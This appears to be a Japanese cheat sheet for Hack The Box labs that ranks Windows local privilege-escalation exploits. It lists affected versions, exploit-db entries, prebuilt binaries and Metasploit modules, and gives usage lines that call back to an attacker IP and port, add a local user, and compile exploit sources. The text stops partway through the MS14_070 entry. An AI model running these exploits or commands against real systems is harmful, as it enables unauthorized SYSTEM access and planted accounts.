Windows Kernel Exploit Cheat Sheet for [HackTheBox]
Windows Kernel Exploitsのチートシートです。
windows-exploit-suggester.pyとSherlock.ps1が検出するExploitの中で悪用できそうなものの数は30種類くらいだったので、これくらいならすべてを事前に調べられそう、ということで調べました。
コンパイル済みのバイナリがあるサイト、またはスクリプトを優先度付きでまとめました。
high,medium,lowの3段階で評価してますが、基準は適当です。バイナリが実際に動いたか、RDP接続が必要か、Metasploitがあるか、などが基準です。頻繁に変えてますので、あくまでも参考程度にしてください。
Usageとかの情報が判明してるのものは書いてますが、よくわからないやつはあんまり書けてないです。自分はそういうやつは優先順位を後回しにしてます。
HTBのWindowsのPEで詰まったらぜひ参考にしてみてください!
- Cheat Sheet
- Potato (high)
- MS09-012 (high)
- MS10_015 (high)
- MS10-047 (low)
- MS10-059 (high)
- MS10-073 (medium)
- MS10-092 (high)
- MS11-011 (medium)
- MS11-046 (high)
- MS11-062 (high)
- MS11-080 (high)
- MS13-005 (medium)
- MS13-053 (medium)
- MS13-081 (medium)
- MS14-002 (high)
- MS14-026 (low)
- MS14-040 (high)
- MS14_058 (high)
- MS14-068 (medium)
- MS14_070 (high)
- MS15_004 (medium)
- MS15-010 (meduim)
- MS15-051 (high)
- MS15-076 (medium)
- MS15-078 (meduim)
- MS15-102 (low)
- MS16-014 (high)
- MS16-016 (high)
- MS16-032 (high)
- MS16-034 (very low)
- MS16-075 (medium)
- MS16-098 (high)
- MS16-135 (high)
- 最後に
Cheat Sheet
Potato (high) MS09-012 (high) MS10_015 (high) MS10-047 (low) MS10-059 (high) MS10-073 (medium) MS10-092 (high) MS11-011 (medium) MS11-046 (high) MS11-062 (high) MS11-080 (high) MS13-005 (medium) MS13-053 (medium) MS13-081 (medium) MS14-002 (high) MS14-026 (low) MS14-040 (high) MS14_058 (high) MS14-068 (medium) MS14_070 (high) MS15_004 (medium) MS15-010 (meduim) MS15-051 (high) MS15-076 (medium) MS15-078 (meduim) MS15-102 (low) MS16-014 (high) MS16-016 (high) MS16-032 (high) MS16-034 (very low) MS16-075 (medium) MS16-098 (high) MS16-135 (high)
Potato (high)
affected version
not depend on OS version
exploit-db
not found
github
以下にJuicy Potatoの64bitのバイナリがある。
usage JuicyPotato.exe whoami
github.com
以下にRottenpotatoのバイナリがある。
usage rottenpotato.exe
で実行後、以下のサイトのようにTokenを使ってSYSTEMになる。
github.com
metasploit
more information
MS09-012 (high)
affected version
Microsoft Windows 2000 Service Pack 4 Windows XP Service Pack 2 および Windows XP Service Pack 3 Windows XP Professional x64 Edition および Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 1 および Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition および Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP1 for Itanium-based Systems および Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista および Windows Vista Service Pack 1 Windows Vista x64 Edition および Windows Vista x64 Edition Service Pack 1 Windows Server 2008 for 32-bit Systems Windows Server 2008 for x64-based Systems Windows Server 2008 for Itanium-based Systems
exploit-db
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation
www.exploit-db.com
github
/xxoo/-->Usage: pr.exe command
usage churrasco.exe whoami
Chimichurri.exe
は未確認
github.com
Chimichurri.exe <my ip> 5555
github.com
metasploit
not found
more information
about Chimichurri.exe
medium.com
MS10_015 (high)
affected version
Windows Server 2003, Windows Server 2008, 7, XP Microsoft Windows 2000 Service Pack 4 Windows XP Service Pack 2 および Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista、Windows Vista Service Pack 1 および Windows Vista Service Pack 2 Windows Vista x64 Edition、Windows Vista x64 Edition Service Pack 1 および Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems および Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems および Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems および Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems
not affected version
Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems Windows Server 2008 R2 for Itanium-based Systems
This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy.
If the session is use is already elevated then the exploit will not run.
The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
exploit-db
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
www.exploit-db.com
github
not support x64
You need to use both vdmallowed.exe and vdmexploit.dll
spawn new SYSTEM window(need RDP??)
github.com
vdmallowed.exe
github.com
metasploit
exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
more information
MS10-047 (low)
affected version
Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 for 32-bit Systems Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-based Systems Windows Server 2008 R2 for x64-based Systems Windows Vista Service Pack 1 Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 Windows Vista x64 Edition Service Pack 2 Windows XP Service Pack 3
not affected version
Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
exploit-db
Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)
www.exploit-db.com
Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)
www.exploit-db.com
github
no??
metasploit
not found
more information
MS10-059 (high)
affected version
Windows Vista Service Pack 1 および Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 および Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems および Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems および Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems および Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems* Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
exploit-db
no??
github
MS10-059.exe
usage MS10-059.exe 10.10.14.20 4447 Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
metasploit
no
more information
MS10-073 (medium)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Itaniumベースシステム用のWindows Server 2003 SP2 Windows Vista Service Pack 1およびWindows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1およびWindows Vista x64 Edition Service Pack 2 32ビットシステム用のWindows Server 2008および32ビットシステム用のWindows Server 2008 Service Pack 2 * Windows Server 2008 for x64-based SystemsおよびWindows Server 2008 for x64-based Systems Service Pack 2 * Itaniumベースシステム用のWindows Server 2008およびItaniumベースシステム用のWindows Server 2008 Service Pack 2 32ビットシステム用のWindows 7 x64ベースシステム用のWindows 7 x64ベースシステム用のWindows Server 2008 R2 * Itaniumベースシステム用のWindows Server 2008 R2
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
exploit-db
Microsoft Win32k - Keyboard Layout (MS10-073)
can not compile
www.exploit-db.com
github
no??
metasploit
post/windows/escalate/ms10_073_kbdlayout 2010-10-12 normal Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation Description: This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.
more information
using metasploit post module
www.youtube.com
MS10-092 (high)
affected version
Windows Vista Service Pack 1 and Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems* Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
exploit-db
Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
www.exploit-db.com
github
metasploit module
github.com
metasploit
exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.
more information
MS11-011 (medium)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 1 および Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 および Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems および Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems および Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems および Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems* Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
exploit-db
Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)
seems DOS
www.exploit-db.com
github
MS11-011.exe
github.com
metasploit
not found
more information
MS11-046 (high)
affected version
# Vulnerable Software: # Windows XP SP3 x86 # Windows XP Pro SP2 x64 # Windows Server 2003 SP2 x86 # Windows Server 2003 SP2 x64 # Windows Server 2003 SP2 Itanium-based Systems # Windows Vista SP1 x86 # Windows Vista SP2 x86 # Windows Vista SP1 x64 # Windows Vista SP2 x64 # Windows Server 2008 x86 # Windows Server 2008 SP2 x86 # Windows Server 2008 x64 # Windows Server 2008 SP2 x64 # Windows Server 2008 Itanium-based Systems # Windows Server 2008 SP2 Itanium-based Systems # Windows 7 x86 # Windows 7 SP1 x86 # Windows 7 x64 # Windows 7 SP1 x64 # Windows Server 2008 R2 x64 # Windows Server 2008 R2 SP1 x64 # Windows Server 2008 R2 Itanium-based Systems # Windows Server 2008 R2 SP1 Itanium-based Systems # Supported Vulnerable Software: # Windows XP SP3 x86 # Windows Server 2003 SP2 x86 # Windows Vista SP1 x86 # Windows Vista SP2 x86 # Windows Server 2008 x86 # Windows Server 2008 SP2 x86 # Windows 7 x86 # Windows 7 SP1 x86 # Tested Software: # Windows XP Pro SP3 x86 EN [5.1.2600] # Windows Server 2003 Ent SP2 EN [5.2.3790] # Windows Vista Ult SP1 x86 EN [6.0.6001] # Windows Vista Ult SP2 x86 EN [6.0.6002] # Windows Server 2008 Dat SP1 x86 EN [6.0.6001] # Windows Server 2008 Ent SP2 x86 EN [6.0.6002] # Windows 7 HB x86 EN [6.1.7600] # Windows 7 Ent SP1 x86 EN [6.1.7601]
exploit-db
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
compile with i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
www.exploit-db.com
github
MS11_46_k8.exe, ms11-046.exe
spawn SYSTEM shell in current window
github.com
have ms11-046.exe
github.com
metasploit
no
more information
MS11-062 (high)
affected version
below
An elevation of privilege vulnerability exists in the NDISTAPI.sys component of the Remote Access Service NDISTAPI driver.The vulnerability is caused when the NDISTAPI driver improperly validates user-supplied input when passing data from user mode to the Windows kernel. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges)
exploit-db
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
# Vulnerable Software: # Windows XP SP3 x86 # Windows XP Pro SP2 x64 # Windows Server 2003 SP2 x86 # Windows Server 2003 SP2 x64 # Windows Server 2003 SP2 Itanium-based Systems # Supported Vulnerable Software: # Windows XP SP3 x86 # Windows Server 2003 SP2 x86 # Tested Software: # Windows XP Pro SP3 x86 EN [5.1.2600] # Windows Server 2003 Ent SP2 EN [5.2.3790]
github
40627.exe, MS11-062.exe
spawn SYSTEM shell in current window
github.com
metasploit
no
more information
MS11-080 (high)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
not affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems および Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems および Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems および Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems および Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
This module exploits a flaw in the AfdJoinLeaf function of the afd. sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability.
exploit-db
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
www.exploit-db.com
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
www.exploit-db.com
github
CVE-2011-2005.py MS11_80_k8.exe ms11-080-AddUser.exe ms11-080.exe
add User and spawn in current window
github.com
have ms11-080.py ms11-080.exe
github.com
metasploit
exploit/windows/local/ms11_080_afdjoinleaf 2011-11-30 average MS11-080 AfdJoinLeaf Privilege Escalation
more information
MS13-005 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for 64-bit Systems Windows Server 2012 Windows RT Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Windows Server 2008 R2 for x64-based Systems Service Pack 1
not affected version
Microsoft Windows XP Service Pack 3 Microsoft Windows XP Professional x64 Edition Service Pack 2 Microsoft Windows Server 2003 Service Pack 2 Microsoft Windows Server 2003 x64 Edition Service Pack 2 Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. This issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+# does not work in Vista, so the attacker will have to check if the user is already running a command prompt and set SPAWN_PROMPT false. Three exploit techniques are available with this module. The WEB technique will execute a powershell encoded payload from a Web location. The FILE technique will drop an executable to the file system, set it to medium integrity and execute it. The TYPE technique will attempt to execute a powershell encoded payload directly from the command line, but may take some time to complete.
exploit-db
Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)
seems DOS
cannot compile
www.exploit-db.com
github
metasploit
exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
more information
MS13-053 (medium)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for 64-bit Systems Windows Server 2012 Windows RT[1] (2850851)
NTUserMessageCall Win32k Kernel Pool Overflow win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability."
exploit-db
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
www.exploit-db.com
github
MS13-053.exe
spawn a SYSTEM shell in new window
github.com
metasploit
exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
more information
MS13-081 (medium)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for 64-bit Systems Windows Server 2012 Windows RT Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 (Server Core installation)
not affected version
Windows 8.1 for 32-bit Systems Windows 8.1 for 64-bit Systems Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows RT 8.1
MS13-081 : TrackPopupMenuEx Win32k NULL Page This module exploits a vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This module has been tested successfully on Windows 7 SP0 and Windows 7 SP1.
successfully on Windows 7 SP0 and Windows 7 SP1.
exploit-db
Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)
www.exploit-db.com
github
no??
metasploit
exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Windows TrackPopupMenuEx Win32k NULL Page
more information
MS14-002 (high)
affected version
Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
not support
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT Windows RT 8.1 Server Core インストール オプション Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core インストール) Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core インストール) Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core インストール) Windows Server 2012 R2 (Server Core インストール) Windows Server 2012 (Server Core インストール)
This module exploits a flaw in the ndproxy. sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system.
exploit-db
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
# Tested on Windows XP SP3
www.exploit-db.com
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
# Vulnerable Software: # Windows XP SP3 x86 # Windows XP SP2 x86-64 # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows XP SP3 x86 # Windows 2003 SP2 x86 # Tested on: # Windows XP SP3 x86 EN # Windows 2003 SP2 x86 EN # CVE ID: 2013-5065 # Exploit compiling: # - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
github
CVE-2013-5065.exe CVE-2013-5065.py MS14-002.exe
c:> MS14-002.exe XP c:> MS14-002.exe 2k3
spawn a SYSTEM shell in current window
github.com
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
have ms14-002.py ms14-002.exe
github.com
metasploit
exploit/windows/local/ms_ndproxy 2013-11-27 average MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
more information
MS14-026 (low)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT Windows RT 8.1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core インストール) Windows Server 2012 (Server Core インストール)
not affected version
Microsoft .NET Framework 3.0 Service Pack 2 Microsoft .NET Framework 3.5 Service Pack 1 Microsoft .NET Framework 4.5.2
[M] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
exploit-db
.NET Remoting Services - Remote Command Execution
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
www.exploit-db.com
github
no??
metasploit
no
more information
MS14-040 (high)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for 32-bit Systems[2] (2973408) Windows 8.1 for x64-based Systems Windows Server 2012 [Windows Server 2012 R2 Windows RT[3] (2961072) Windows RT 8.1[1][3] (2961072)
exploit-db
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
# Tested on: Win7 x32 # afd.sys - 6.1.7600.16385 # ntdll.dll - 6.1.7600.16385
github
MS14-40-x32.py 39525.py 39446.py MS14-40-x86.exe MS14-040-x64.exe
github.com
metasploit
no
more information
MS14_058 (high)
affected version
Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3000061) Windows RT 8.1[1] (3000061) Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
exploit-db
Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
txt. have URL
www.exploit-db.com
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
www.exploit-db.com
github
MS14-058.exe Exploit.exe
github.com
metasploit
exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
more information
MS14-068 (medium)
affected version
Windows Server 2003 Windows Server 2003 Service Pack 2 Windows Server 2003 x 64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based System Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
exploit-db
Microsoft Windows Kerberos - Privilege Escalation (MS14-068)
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
www.exploit-db.com
github
USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
metasploit
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
more information
MS14_070 (high)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based System
exploit-db
Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)
# Vulnerable Software: # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows 2003 SP2 x86 # Tested on: # Windows 2003 SP2 x86 EN
www.exploit-db.com
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
